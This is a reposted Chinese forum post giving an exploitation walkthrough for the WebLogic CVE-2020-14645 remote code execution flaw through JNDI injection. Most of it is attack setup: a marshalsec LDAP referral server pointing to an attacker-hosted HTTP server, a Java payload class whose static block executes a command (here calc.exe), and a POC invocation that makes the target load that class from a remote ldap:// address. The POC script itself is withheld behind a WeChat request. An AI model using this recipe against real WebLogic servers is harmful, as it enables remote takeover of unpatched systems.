Weblogic CVE-2020-14645 RCE(远程代码执行漏洞
2020-08-01 01:05:04 Author: forum.90sec.com(查看原文) 阅读量:579 收藏

Weblogic CVE-2020-14645 RCE(远程代码执行漏洞)

WebLogic是Oracle公司出品的用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器,全球使用广泛。

影响版本

  • Oracle WebLogic Server 12.2.1.4
  • Oracle WebLogic Server 12.2.1.4.x

利用条件

  • 开放T3协议(默认开放)
  • JDK < 6u211/7u201/8u191 (因为是JNDI注入,所以只影响JEP290之前的版本)

环境准备

  • ldap

    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://xxx.xxx.xxx.xxx:998/#exp" 99
    
//https://github.com/mbechler/marshalsec   download

  • Web

    python3 -m http.server 998
python -m SimpleHTTPServer 998

  • JAVA_code

    import java.lang.Runtime;
import java.lang.Process;

public class exp {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"cmd.exe", "/c","calc.exe"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

    编译

    javac exp.java

验证POC

python 14645.py 127.0.0.1 7001 "ldap://xx.xxx.xxx.x:99/#exp"
FB0B7254-2ED1-41F8-82B6-9AE38DDC6AD2

POC编写参考Rabbitmask 大佬的Weblogic_Scan

验证POC 回复公众号 14645

qrcode_for_gh_cf59676825b0_1280

文章来源: https://forum.90sec.com/t/topic/1235/1
如有侵权请联系:admin#unsafe.sh